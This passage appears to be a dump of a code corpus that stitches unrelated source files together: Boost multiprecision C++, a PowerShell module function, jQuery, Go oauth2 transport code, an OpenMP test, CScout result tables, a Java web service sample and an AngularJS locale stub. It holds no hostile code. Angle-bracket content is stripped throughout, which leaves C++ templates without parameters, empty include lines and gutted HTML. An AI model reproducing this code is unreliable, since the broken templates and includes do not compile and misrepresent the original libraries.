-1 : 1;\r\n\r\n // Only do the compare if the same sign:\r\n int result = compare_unsigned(o);\r\n\r\n if(this->sign())\r\n result = -result;\r\n return result;\r\n }\r\n template \r\n int compare_imp(const cpp_int_backend& o, const mpl::true_&, const mpl::false_&)const\r\n {\r\n cpp_int_backend t(*this);\r\n return t.compare(o);\r\n }\r\n template \r\n int compare_imp(const cpp_int_backend& o, const mpl::false_&, const mpl::true_&)const\r\n {\r\n cpp_int_backend t(o);\r\n return compare(t);\r\n }\r\n template \r\n int compare_imp(const cpp_int_backend& o, const mpl::true_&, const mpl::true_&)const BOOST_NOEXCEPT\r\n {\r\n if(this->sign())\r\n {\r\n if(o.sign())\r\n {\r\n return *this->limbs() < *o.limbs() ? 1 : (*this->limbs() > *o.limbs() ? -1 : 0);\r\n }\r\n else\r\n return -1;\r\n }\r\n else\r\n {\r\n if(o.sign())\r\n return 1;\r\n return *this->limbs() < *o.limbs() ? -1 : (*this->limbs() > *o.limbs() ? 1 : 0);\r\n }\r\n }\r\n template \r\n int compare(const cpp_int_backend& o)const BOOST_NOEXCEPT\r\n {\r\n typedef mpl::bool_ >::value> t1;\r\n typedef mpl::bool_ >::value> t2;\r\n return compare_imp(o, t1(), t2());\r\n }\r\n template \r\n int compare_unsigned(const cpp_int_backend& o)const BOOST_NOEXCEPT\r\n {\r\n if(this->size() != o.size())\r\n {\r\n return this->size() > o.size() ? 1 : -1;\r\n }\r\n typename base_type::const_limb_pointer pa = this->limbs();\r\n typename base_type::const_limb_pointer pb = o.limbs();\r\n for(int i = this->size() - 1; i >= 0; --i)\r\n {\r\n if(pa[i] != pb[i])\r\n return pa[i] > pb[i] ? 1 : -1;\r\n }\r\n return 0;\r\n }\r\n template \r\n BOOST_MP_FORCEINLINE typename boost::enable_if, int>::type compare(Arithmetic i)const\r\n {\r\n // braindead version:\r\n cpp_int_backend t;\r\n t = i;\r\n return compare(t);\r\n }\r\n};\r\n\r\n} // namespace backends\r\n\r\nnamespace default_ops{\r\n\r\ntemplate \r\nstruct double_precision_type;\r\n\r\ntemplate \r\nstruct double_precision_type >\r\n{\r\n typedef typename mpl::if_c<\r\n backends::is_fixed_precision >::value,\r\n backends::cpp_int_backend<\r\n (is_void::value ?\r\n 2 * backends::max_precision >::value\r\n : MinBits),\r\n 2 * backends::max_precision >::value,\r\n SignType,\r\n Checked,\r\n Allocator>,\r\n backends::cpp_int_backend\r\n >::type type;\r\n};\r\n\r\n\r\n}\r\n\r\ntemplate \r\nstruct expression_template_default >\r\n{\r\n static const expression_template_option value = et_off;\r\n};\r\n\r\nusing boost::multiprecision::backends::cpp_int_backend;\r\n\r\ntemplate \r\nstruct number_category > : public mpl::int_{};\r\n\r\ntypedef number > cpp_int;\r\ntypedef rational_adaptor > cpp_rational_backend;\r\ntypedef number cpp_rational;\r\n\r\n// Fixed precision unsigned types:\r\ntypedef number > uint128_t;\r\ntypedef number > uint256_t;\r\ntypedef number > uint512_t;\r\ntypedef number > uint1024_t;\r\n\r\n// Fixed precision signed types:\r\ntypedef number > int128_t;\r\ntypedef number > int256_t;\r\ntypedef number > int512_t;\r\ntypedef number > int1024_t;\r\n\r\n// Over again, but with checking enabled this time:\r\ntypedef number > checked_cpp_int;\r\ntypedef rational_adaptor > checked_cpp_rational_backend;\r\ntypedef number checked_cpp_rational;\r\n// Fixed precision unsigned types:\r\ntypedef number > checked_uint128_t;\r\ntypedef number > checked_uint256_t;\r\ntypedef number > checked_uint512_t;\r\ntypedef number > checked_uint1024_t;\r\n\r\n// Fixed precision signed types:\r\ntypedef number > checked_int128_t;\r\ntypedef number > checked_int256_t;\r\ntypedef number > checked_int512_t;\r\ntypedef 
number > checked_int1024_t;\r\n\r\n#ifdef BOOST_NO_SFINAE_EXPR\r\n\r\nnamespace detail{\r\n\r\ntemplate\r\nstruct is_explicitly_convertible, cpp_int_backend > : public mpl::true_ {};\r\n\r\n}\r\n#endif\r\n\r\n#ifdef _MSC_VER\r\n#pragma warning(pop)\r\n#endif\r\n\r\n}} // namespaces\r\n\r\n//\r\n// Last of all we include the implementations of all the eval_* non member functions:\r\n//\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#ifdef BOOST_MP_USER_DEFINED_LITERALS\r\n#include \r\n#endif\r\n#include \r\n#include \r\n\r\n#endif\r\n"} {"text": "function Register-PSFMessageTransform\n{\n\t<#\n\t\t.SYNOPSIS\n\t\t\tRegisters a scriptblock that can transform message content.\n\t\t\n\t\t.DESCRIPTION\n\t\t\tRegisters a scriptblock that can transform message content.\n\t\t\tThis can be used to convert some kinds of input. Specifically:\n\t\t\t\n\t\t\tTarget:\n\t\t\tWhen specifying a target, this target may require some conversion.\n\t\t\tFor example, an object containing a live connection may need to have a static copy stored instead,\n\t\t\tas otherwise its export on a different runspace may cause access violations.\n\t\t\t\n\t\t\tExceptions:\n\t\t\tSome exceptions may need transforming.\n\t\t\tFor example some APIs might wrap the actual exception into a common wrapper.\n\t\t\tIn this scenario you may want the actual exception in order to provide more specific information.\n\t\t\t\n\t\t\tIn all instances, the scriptblock will be called, receiving only the relevant object as its sole input.\n\t\t\t\n\t\t\tNote: This transformation is performed synchronously on the active runspace. Complex scriptblocks may delay execution times when a matching object is passed.\n\t\t\n\t\t.PARAMETER TargetType\n\t\t\tThe full typename of the target object to apply the scriptblock to.\n\t\t\tAll objects of that typename will be processed through that scriptblock.\n\t\t\n\t\t.PARAMETER ExceptionType\n\t\t\tThe full typename of the exception object to apply the scriptblock to.\n\t\t\tAll objects of that typename will be processed through that scriptblock.\n\t\t\tNote: In case of error records, the type of the Exception Property is inspected. 
The error record as a whole will not be touched, except for having its exception exchanged.\n\t\t\n\t\t.PARAMETER ScriptBlock\n\t\t\tThe scriptblock that performs the transformation.\n\t\t\n\t\t.PARAMETER TargetTypeFilter\n\t\t\tA filter for the typename of the target object to transform.\n\t\t\tSupports wildcards, but not regex.\n\t\t\tWARNING: Adding too many filter-type transforms may impact overall performance, try to avoid using them!\n\t\t\n\t\t.PARAMETER ExceptionTypeFilter\n\t\t\tA filter for the typename of the exception object to transform.\n\t\t\tSupports wildcards, but not regex.\n\t\t\tWARNING: Adding too many filter-type transforms may impact overall performance, try to avoid using them!\n\t\t\n\t\t.PARAMETER FunctionNameFilter\n\t\t\tDefault: \"*\"\n\t\t\tAllows filtering by function name, in order to consider whether the function is affected.\n\t\t\tSupports wildcards, but not regex.\n\t\t\tWARNING: Adding too many filter-type transforms may impact overall performance, try to avoid using them!\n\t\t\n\t\t.PARAMETER ModuleNameFilter\n\t\t\tDefault: \"*\"\n\t\t\tAllows filtering by module name, in order to consider whether the function is affected.\n\t\t\tSupports wildcards, but not regex.\n\t\t\tWARNING: Adding too many filter-type transforms may impact overall performance, try to avoid using them!\n\t\t\n\t\t.EXAMPLE\n\t\t\tPS C:\\> Register-PSFMessageTransform -TargetType 'mymodule.category.classname' -ScriptBlock $ScriptBlock\n\t\t\t\n\t\t\tWhenever a target object of type 'mymodule.category.classname' is specified, invoke $ScriptBlock (with the object as sole argument) and store the result as target instead.\n\t\t\n\t\t.EXAMPLE\n\t\t\tPS C:\\> Register-PSFMessageTransform -ExceptionType 'mymodule.category.exceptionname' -ScriptBlock $ScriptBlock\n\t\t\t\n\t\t\tWhenever an exception or error record of type 'mymodule.category.classname' is specified, invoke $ScriptBlock (with the object as sole argument) and store the result as exception instead.\n\t\t\tIf the full error record is specified, only the updated exception will be inserted\n\t\n\t\t.EXAMPLE\n\t\t\tPS C:\\> Register-PSFMessageTransform -TargetTypeFilter 'mymodule.category.*' -ScriptBlock $ScriptBlock\n\t\n\t\t\tAdds a transform for all target objects that are of a type whose full name starts with 'mymodule.category.'\n\t\t\tAll target objects matching that typename will be run through the specified scriptblock, which in return generates the new target object.\n\t#>\n\t[CmdletBinding(PositionalBinding = $false, HelpUri = 'https://psframework.org/documentation/commands/PSFramework/Register-PSFMessageTransform')]\n\tParam (\n\t\t[Parameter(Mandatory = $true, ParameterSetName = \"Target\")]\n\t\t[string]\n\t\t$TargetType,\n\t\t\n\t\t[Parameter(Mandatory = $true, ParameterSetName = \"Exception\")]\n\t\t[string]\n\t\t$ExceptionType,\n\t\t\n\t\t[Parameter(Mandatory = $true)]\n\t\t[ScriptBlock]\n\t\t$ScriptBlock,\n\t\t\n\t\t[Parameter(Mandatory = $true, ParameterSetName = \"TargetFilter\")]\n\t\t[string]\n\t\t$TargetTypeFilter,\n\t\t\n\t\t[Parameter(Mandatory = $true, ParameterSetName = \"ExceptionFilter\")]\n\t\t[string]\n\t\t$ExceptionTypeFilter,\n\t\t\n\t\t[Parameter(ParameterSetName = \"TargetFilter\")]\n\t\t[Parameter(ParameterSetName = \"ExceptionFilter\")]\n\t\t$FunctionNameFilter = \"*\",\n\t\t\n\t\t[Parameter(ParameterSetName = \"TargetFilter\")]\n\t\t[Parameter(ParameterSetName = \"ExceptionFilter\")]\n\t\t$ModuleNameFilter = \"*\"\n\t)\n\t\n\tprocess\n\t{\n\t\tif ($TargetType) { 
[PSFramework.Message.MessageHost]::TargetTransforms[$TargetType] = $ScriptBlock }\n\t\tif ($ExceptionType) { [PSFramework.Message.MessageHost]::ExceptionTransforms[$ExceptionType] = $ScriptBlock }\n\t\t\n\t\tif ($TargetTypeFilter)\n\t\t{\n\t\t\t$condition = New-Object PSFramework.Message.TransformCondition($TargetTypeFilter, $ModuleNameFilter, $FunctionNameFilter, $ScriptBlock, \"Target\")\n\t\t\t[PSFramework.Message.MessageHost]::TargetTransformList.Add($condition)\n\t\t}\n\t\t\n\t\tif ($ExceptionTypeFilter)\n\t\t{\n\t\t\t$condition = New-Object PSFramework.Message.TransformCondition($ExceptionTypeFilter, $ModuleNameFilter, $FunctionNameFilter, $ScriptBlock, \"Exception\")\n\t\t\t[PSFramework.Message.MessageHost]::ExceptionTransformList.Add($condition)\n\t\t}\n\t}\n}"} {"text": "// Portfolio\nvar Portfolio = function() {\n 'use strict';\n\n // Handle Portfolio\n var handlePortfolio = function() {\n $('#js__grid-portfolio-gallery').cubeportfolio({\n filters: '#js__filters-portfolio-gallery',\n layoutMode: 'grid',\n mediaQueries: [{\n width: 1500,\n cols: 3\n }, {\n width: 1100,\n cols: 3\n }, {\n width: 800,\n cols: 3\n }, {\n width: 480,\n cols: 2\n }, {\n width: 320,\n cols: 1\n }],\n defaultFilter: '*',\n gapHorizontal: 2,\n gapVertical: 2,\n gridAdjustment: 'responsive',\n caption: ' ',\n\n // lightbox\n lightboxDelegate: '.cbp-lightbox',\n lightboxGallery: true,\n lightboxTitleSrc: 'data-title',\n });\n }\n\n return {\n init: function() {\n handlePortfolio(); // initial setup for Portfolio\n }\n }\n}();\n\n$(document).ready(function() {\n Portfolio.init();\n});"} {"text": "// Copyright 2014 The Go Authors. All rights reserved.\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file.\n\npackage oauth2\n\nimport (\n\t\"errors\"\n\t\"io\"\n\t\"net/http\"\n\t\"sync\"\n)\n\n// Transport is an http.RoundTripper that makes OAuth 2.0 HTTP requests,\n// wrapping a base RoundTripper and adding an Authorization header\n// with a token from the supplied Sources.\n//\n// Transport is a low-level mechanism. 
Most code will use the\n// higher-level Config.Client method instead.\ntype Transport struct {\n\t// Source supplies the token to add to outgoing requests'\n\t// Authorization headers.\n\tSource TokenSource\n\n\t// Base is the base RoundTripper used to make HTTP requests.\n\t// If nil, http.DefaultTransport is used.\n\tBase http.RoundTripper\n\n\tmu sync.Mutex // guards modReq\n\tmodReq map[*http.Request]*http.Request // original -> modified\n}\n\n// RoundTrip authorizes and authenticates the request with an\n// access token from Transport's Source.\nfunc (t *Transport) RoundTrip(req *http.Request) (*http.Response, error) {\n\treqBodyClosed := false\n\tif req.Body != nil {\n\t\tdefer func() {\n\t\t\tif !reqBodyClosed {\n\t\t\t\treq.Body.Close()\n\t\t\t}\n\t\t}()\n\t}\n\n\tif t.Source == nil {\n\t\treturn nil, errors.New(\"oauth2: Transport's Source is nil\")\n\t}\n\ttoken, err := t.Source.Token()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq2 := cloneRequest(req) // per RoundTripper contract\n\ttoken.SetAuthHeader(req2)\n\tt.setModReq(req, req2)\n\tres, err := t.base().RoundTrip(req2)\n\n\t// req.Body is assumed to have been closed by the base RoundTripper.\n\treqBodyClosed = true\n\n\tif err != nil {\n\t\tt.setModReq(req, nil)\n\t\treturn nil, err\n\t}\n\tres.Body = &onEOFReader{\n\t\trc: res.Body,\n\t\tfn: func() { t.setModReq(req, nil) },\n\t}\n\treturn res, nil\n}\n\n// CancelRequest cancels an in-flight request by closing its connection.\nfunc (t *Transport) CancelRequest(req *http.Request) {\n\ttype canceler interface {\n\t\tCancelRequest(*http.Request)\n\t}\n\tif cr, ok := t.base().(canceler); ok {\n\t\tt.mu.Lock()\n\t\tmodReq := t.modReq[req]\n\t\tdelete(t.modReq, req)\n\t\tt.mu.Unlock()\n\t\tcr.CancelRequest(modReq)\n\t}\n}\n\nfunc (t *Transport) base() http.RoundTripper {\n\tif t.Base != nil {\n\t\treturn t.Base\n\t}\n\treturn http.DefaultTransport\n}\n\nfunc (t *Transport) setModReq(orig, mod *http.Request) {\n\tt.mu.Lock()\n\tdefer t.mu.Unlock()\n\tif t.modReq == nil {\n\t\tt.modReq = make(map[*http.Request]*http.Request)\n\t}\n\tif mod == nil {\n\t\tdelete(t.modReq, orig)\n\t} else {\n\t\tt.modReq[orig] = mod\n\t}\n}\n\n// cloneRequest returns a clone of the provided *http.Request.\n// The clone is a shallow copy of the struct and its Header map.\nfunc cloneRequest(r *http.Request) *http.Request {\n\t// shallow copy of the struct\n\tr2 := new(http.Request)\n\t*r2 = *r\n\t// deep copy of the Header\n\tr2.Header = make(http.Header, len(r.Header))\n\tfor k, s := range r.Header {\n\t\tr2.Header[k] = append([]string(nil), s...)\n\t}\n\treturn r2\n}\n\ntype onEOFReader struct {\n\trc io.ReadCloser\n\tfn func()\n}\n\nfunc (r *onEOFReader) Read(p []byte) (n int, err error) {\n\tn, err = r.rc.Read(p)\n\tif err == io.EOF {\n\t\tr.runFunc()\n\t}\n\treturn\n}\n\nfunc (r *onEOFReader) Close() error {\n\terr := r.rc.Close()\n\tr.runFunc()\n\treturn err\n}\n\nfunc (r *onEOFReader) runFunc() {\n\tif fn := r.fn; fn != nil {\n\t\tfn()\n\t\tr.fn = nil\n\t}\n}\n"} {"text": "// The OpenMP standard defines 3 ways of providing ompt_start_tool:\n// 1. \"statically-linking the tool’s definition of ompt_start_tool into an OpenMP application\"\n// RUN: %libomp-compile -DCODE -DTOOL && %libomp-run | FileCheck %s\n\n// Note: We should compile the tool without -fopenmp as other tools developer\n// would do. Otherwise this test may pass for the wrong reasons on Darwin.\n// RUN: %clang %flags -DTOOL -shared -fPIC %s -o %T/tool.so\n// 2. 
\"introducing a dynamically-linked library that includes the tool’s definition of ompt_start_tool into the application’s address space\"\n// 2.1 Link with tool during compilation\n// RUN: %libomp-compile -DCODE %no-as-needed-flag %T/tool.so && %libomp-run | FileCheck %s\n// 2.2 Link with tool during compilation, but AFTER the runtime\n// RUN: %libomp-compile -DCODE -lomp %no-as-needed-flag %T/tool.so && %libomp-run | FileCheck %s\n// 2.3 Inject tool via the dynamic loader\n// RUN: %libomp-compile -DCODE && %preload-tool %libomp-run | FileCheck %s\n\n// 3. \"providing the name of a dynamically-linked library appropriate for the architecture and operating system used by the application in the tool-libraries-var ICV\"\n// RUN: %libomp-compile -DCODE && env OMP_TOOL_LIBRARIES=%T/tool.so %libomp-run | FileCheck %s\n\n// REQUIRES: ompt\n\n/*\n * This file contains code for an OMPT shared library tool to be \n * loaded and the code for the OpenMP executable. \n * -DTOOL enables the code for the tool during compilation\n * -DCODE enables the code for the executable during compilation\n */\n\n#ifdef CODE\n#include \"stdio.h\"\n#include \"omp.h\"\n#include \"omp-tools.h\"\n\nint main()\n{\n #pragma omp parallel num_threads(2)\n {\n #pragma omp master\n {\n int result = omp_control_tool(omp_control_tool_start, 0, NULL);\n printf(\"0: control_tool()=%d\\n\", result);\n }\n }\n\n\n // Check if libomp supports the callbacks for this test.\n // CHECK-NOT: {{^}}0: Could not register callback \n \n // CHECK: {{^}}0: Do not initialize tool\n // CHECK: {{^}}0: control_tool()=-2\n \n\n return 0;\n}\n\n#endif /* CODE */\n\n#ifdef TOOL\n\n#include \n#include \"stdio.h\"\n\nompt_start_tool_result_t* ompt_start_tool(\n unsigned int omp_version,\n const char *runtime_version)\n{\n printf(\"0: Do not initialize tool\\n\");\n return NULL;\n}\n#endif /* TOOL */\n"} {"text": "config DVB_PT1\n\ttristate \"PT1 cards\"\n\tdepends on DVB_CORE && PCI && I2C\n\thelp\n\t Support for Earthsoft PT1 PCI cards.\n\n\t Since these cards have no MPEG decoder onboard, they transmit\n\t only compressed MPEG data over the PCI bus, so you need\n\t an external software decoder to watch TV on your computer.\n\n\t Say Y or M if you own such a device and want to use it.\n\n"} {"text": "\n\n\nwindows::object_handle::assign (1 of 2 overloads)\n\n\n\n\n\n\n\n\n
\"asio
\n
\n
\n\"Prev\"\"Up\"\"Home\"\"Next\"\n
\n
\n\n

\n Assign an existing native handle to the handle.\n

\n
void assign(\n    const native_handle_type & handle);\n
\n
\n\n\n\n
Copyright © 2003-2018 Christopher M. Kohlhoff

\n Distributed under the Boost Software License, Version 1.0. (See accompanying\n file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)\n

\n
\n
\n
\n\"Prev\"\"Up\"\"Home\"\"Next\"\n
\n\n\n"} {"text": "Table: Ids\n EID NAME READONLY UNDEFMACRO MACRO MACROARG ORDINARY SUETAG SUMEMBER LABEL TYPEDEF ENUM YACC FUN CSCOPE LSCOPE UNUSED\n---- -------------- -------- ---------- ----- -------- -------- ------ -------- ----- ------- ----- ----- ----- ------ ------ ------\n 9 foo FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE FALSE TRUE FALSE\n 91 MAXDIGIT FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n 159 a FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE\n 331 x FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE TRUE\n 441 main TRUE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE FALSE TRUE FALSE\n 489 label FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n 571 qqq FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE TRUE\n1239 nokey FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n2299 lfor1 FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n2975 __DATE__ TRUE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n3295 __TIME__ TRUE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n3575 __FILE__ TRUE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n3865 __LINE__ TRUE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n3939 label2 FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n4055 __STDC__ TRUE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE TRUE\n5355 _cscout_dummy1 TRUE FALSE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE TRUE FALSE FALSE\nTable: Tokens\nFID FOFFSET EID\n--- ------- ----\n 2 297 2975\n 2 329 3295\n 2 357 3575\n 2 386 3865\n 2 405 4055\n 2 471 441\n 2 535 5355\n 2 558 5355\n 4 0 9\n 4 15 159\n 4 48 489\n 4 55 159\n 4 123 1239\n 4 130 159\n 4 147 159\n 4 164 159\n 4 193 159\n 4 229 2299\n 4 250 159\n 4 316 9\n 4 393 3939\n 5 8 91\n 5 32 331\n 5 43 441\n 5 56 571\n 5 88 9\nTable: Rest\nFID FOFFSET CODE\n--- ------- -----------------------------------------------------------------------------------\n 2 287 \\u0000a\\u0000a#define \n 2 305 \n 2 320 \\u0000a#define \n 2 337 \n 2 348 \\u0000a#define \n 2 365 \n 2 377 \\u0000a#define \n 2 394 1\\u0000a#define \n 2 413 1\\u0000a\\u0000a\n 2 466 \\u0000aint \n 2 475 ();\\u0000a\n 2 522 \\u0000astatic void \n 2 549 (void) { \n 2 572 (); }\\u0000a\n 3 152 \\u0000a\\u0000a\\u0000a#pragma includepath \n 3 195 \\u0000a\n 3 239 \\u0000astatic void _cscout_dummy2(void) { _cscout_dummy2(); }\\u0000a\n 4 3 ()\\u0000d\\u0000a{\\u0000d\\u0000a\tint \n 4 16 ;\\u0000d\\u0000a\\u0000d\\u0000a\t\n 4 45 \\u0000d\\u0000a\t\n 4 53 : \n 4 56 = 2;\\u0000d\\u0000a\tif (1)\\u0000d\\u0000a\t\t\n 4 119 \\u0000d\\u0000a\t\t\n 4 128 : \n 4 131 = 3;\\u0000d\\u0000a\telse\\u0000d\\u0000a\t\t\n 4 148 = 2;\\u0000d\\u0000a\tswitch (\n 4 165 ) {\\u0000d\\u0000a\tcase 2:\\u0000d\\u0000a\t}\\u0000d\\u0000a\tswitch (\n 4 194 ) {\\u0000d\\u0000a\tdefault:\\u0000d\\u0000a\t}\\u0000d\\u0000a\tfor (;;) {\\u0000d\\u0000a\t\t\n 4 234 :\\u0000d\\u0000a\t}\\u0000d\\u0000a\tswitch (\n 4 251 ) {\\u0000d\\u0000a\t\n 4 281 \\u0000d\\u0000a\tcase 1:\\u0000d\\u0000a\tcase 2:\\u0000d\\u0000a\tdefault:\\u0000d\\u0000a\t\t\n 4 319 
();\\u0000d\\u0000a\t}\\u0000d\\u0000a\t\n 4 390 \\u0000d\\u0000a\t\n 4 399 :\\u0000d\\u0000a}\\u0000d\\u0000a\n 5 0 #define \n 5 16 11\\u0000d\\u0000aextern int \n 5 33 ;\\u0000d\\u0000aextern \n 5 47 ();\\u0000d\\u0000aint \n 5 59 ;\\u0000d\\u0000a\\u0000d\\u0000a\n 5 86 \\u0000d\\u0000a\n 5 91 () {\\u0000d\\u0000a\t\n 5 116 }\\u0000d\\u0000a\\u0000d\\u0000a\nTable: Projects\nPID NAME\n--- -----------\n 16 unspecified\n 17 Prj1\n 18 Prj2\nTable: IdProj\n EID PID\n---- ---\n 9 17\n 159 17\n 441 17\n 489 17\n1239 17\n2299 17\n2975 17\n3295 17\n3575 17\n3865 17\n3939 17\n4055 17\n5355 17\n 9 18\n 91 18\n 159 18\n 331 18\n 441 18\n 489 18\n 571 18\n1239 18\n2299 18\n2975 18\n3295 18\n3575 18\n3865 18\n3939 18\n4055 18\n5355 18\nTable: Files\nFID NAME RO NCHAR NCCOMMENT NSPACE NLCOMMENT NBCOMMENT NLINE MAXLINELEN NSTRING NULINE NPPDIRECTIVE NPPCOND NPPFMACRO NPPOMACRO NPPTOKEN NCTOKEN NCOPIES NSTATEMENT NPFUNCTION NFFUNCTION NPVAR NFVAR NAGGREGATE NAMEMBER NENUM NEMEMBER NINCFILE\n--- -------------- ----- ----- --------- ------ --------- --------- ----- ---------- ------- ------ ------------ ------- --------- --------- -------- ------- ------- ---------- ---------- ---------- ----- ----- ---------- -------- ----- -------- --------\n 2 host-defs.h TRUE 578 367 29 0 3 22 61 3 0 5 0 0 5 37 18 1 1 0 1 0 0 0 0 0 0 0\n 3 host-incs.h TRUE 295 187 13 0 2 13 54 1 0 1 0 0 0 16 0 1 0 0 0 0 0 0 0 0 0 0\n 4 c36-endlabel.c FALSE 405 137 112 0 4 30 63 0 0 0 0 0 0 75 76 1 18 1 0 0 0 0 0 0 0 0\n 5 prj2.c FALSE 121 34 26 2 0 11 21 0 0 1 0 0 1 21 18 1 0 1 0 2 0 0 0 0 0 0\nTable: FileProj\nFID PID\n--- ---\n 2 17\n 3 17\n 4 17\n 1 18\n 2 18\n 3 18\n 4 18\n 5 18\nTable: Definers\nPID CUID BASEFILEID DEFINERID\n--- ---- ---------- ---------\n 18 5 5 2\n 18 5 5 4\nTable: Includers\nPID CUID BASEFILEID INCLUDERID\n--- ---- ---------- ----------\n 17 2 2 1\n 17 4 3 1\n 17 4 4 1\n 18 2 2 1\n 18 2 2 1\n 18 4 3 1\n 18 4 4 1\n 18 5 3 1\n 18 5 5 1\nTable: Providers\nPID CUID PROVIDERID\n--- ---- ----------\n 17 2 2\n 17 4 4\n 18 2 2\n 18 2 2\n 18 4 4\n 18 5 5\nTable: IncTriggers\nPID CUID BASEFILEID DEFINERID FOFFSET LEN\n--- ---- ---------- --------- ------- ---\n 18 5 5 2 471 4\n 18 5 5 4 0 3\nTable: Functions\n ID NAME ISMACRO DEFINED DECLARED FILESCOPED FID FOFFSET FANIN\n---- -------------- ------- ------- -------- ---------- --- ------- -----\n 891 foo FALSE TRUE TRUE FALSE 5 88 1\n4715 main FALSE FALSE TRUE FALSE 2 471 0\n5355 _cscout_dummy1 FALSE TRUE TRUE TRUE 2 535 1\nTable: FunctionMetrics\nFUNCTIONID NCHAR NCCOMMENT NSPACE NLCOMMENT NBCOMMENT NLINE MAXLINELEN NSTRING NULINE NPPDIRECTIVE NPPCOND NPPFMACRO NPPOMACRO NPPTOKEN NCTOKEN NSTMT NOP NUOP NNCONST NCLIT NIF NELSE NSWITCH NCASE NDEFAULT NBREAK NFOR NWHILE NDO NCONTINUE NGOTO NRETURN NPID NFID NMID NID NUPID NUFID NUMID NUID NGNSOC NPARAM MAXNEST NLABEL FANIN FANOUT CCYCL1 CCYCL2 CCYCL3 CSTRUC CHAL IFLOW FIDBEGIN FOFFSETBEGIN FIDEND FOFFSETEND\n---------- ----- --------- ------ --------- --------- ----- ---------- ------- ------ ------------ ------- --------- --------- -------- ------- ----- --- ---- ------- ----- --- ----- ------- ----- -------- ------ ---- ------ --- --------- ----- ------- ---- ---- ---- --- ----- ----- ----- ---- ------ ------ ------- ------ ----- ------ ------ ------ ------ ------ --------- ----- -------- ------------ ------ ----------\n 891 396 137 109 0 4 28 63 0 0 0 0 0 0 71 71 10 3 1 7 0 1 1 3 3 2 0 1 0 0 0 0 0 1 0 0 8 1 0 0 2 16 0 1 4 1 1 6 6 6 1.0E0 59.7947E0 6.0E0 4 8 4 403\n 5355 21 0 3 0 0 1 20 0 0 0 0 0 0 5 5 1 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 1 0 1 0 1 0 1 9 0 0 0 1 1 1 1 1 1.0E0 0.0E0 1.0E0 2 557 2 577\nTable: FunctionId\nFUNCTIONID ORDINAL EID\n---------- ------- ----\n 891 0 9\n 4715 0 441\n 5355 0 5355\nTable: Fcalls\nSOURCEID DESTID\n-------- ------\n 891 891\n 5355 5355\nDone\n"} {"text": "/*\n * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER.\n *\n * Copyright (c) 1997-2017 Oracle and/or its affiliates. All rights reserved.\n *\n * The contents of this file are subject to the terms of either the GNU\n * General Public License Version 2 only (\"GPL\") or the Common Development\n * and Distribution License(\"CDDL\") (collectively, the \"License\"). You\n * may not use this file except in compliance with the License. You can\n * obtain a copy of the License at\n * https://oss.oracle.com/licenses/CDDL+GPL-1.1\n * or LICENSE.txt. See the License for the specific\n * language governing permissions and limitations under the License.\n *\n * When distributing the software, include this License Header Notice in each\n * file and include the License file at LICENSE.txt.\n *\n * GPL Classpath Exception:\n * Oracle designates this particular file as subject to the \"Classpath\"\n * exception as provided by Oracle in the GPL Version 2 section of the License\n * file that accompanied this code.\n *\n * Modifications:\n * If applicable, add the following below the License Header, with the fields\n * enclosed by brackets [] replaced by your own identifying information:\n * \"Portions Copyright [year] [name of copyright owner]\"\n *\n * Contributor(s):\n * If you wish your version of this file to be governed by only the CDDL or\n * only the GPL Version 2, indicate your decision by adding \"[Contributor]\n * elects to include this software in this distribution under the [CDDL or GPL\n * Version 2] license.\" If you don't indicate a single choice of license, a\n * recipient has the option to distribute your version of this file under\n * either the CDDL, the GPL Version 2 or to extend the choice of license to\n * its licensees as provided above. However, if you add GPL Version 2 code\n * and therefore, elected the GPL Version 2 license, then the option applies\n * only if the new code is made subject to such option by the copyright\n * holder.\n */\n\npackage wsa.w3c.fromwsdl.issue608.server;\n\nimport javax.jws.WebService;\n\n/**\n * @author Rama Pulavarthi\n */\n\n@WebService(serviceName=\"AddNumbersService\", portName=\"AddNumbersPort\",\n endpointInterface = \"wsa.w3c.fromwsdl.issue608.server.AddNumbersPortType\", targetNamespace = \"http://example.com/\")\npublic class AddNumbersImpl implements AddNumbersPortType {\n public int addNumbers( int number1, int number2) throws AddNumbersFault_Exception {\n return number1 + number2;\n }\n\n\n}\n"} {"text": "'use strict';\nangular.module(\"ngLocale\", [], [\"$provide\", function($provide) {\nvar PLURAL_CATEGORY = {ZERO: \"zero\", ONE: \"one\", TWO: \"two\", FEW: \"few\", MANY: \"many\", OTHER: \"other\"};\nfunction getDecimals(n) {\n n = n + '';\n var i = n.indexOf('.');\n return (i == -1) ? 
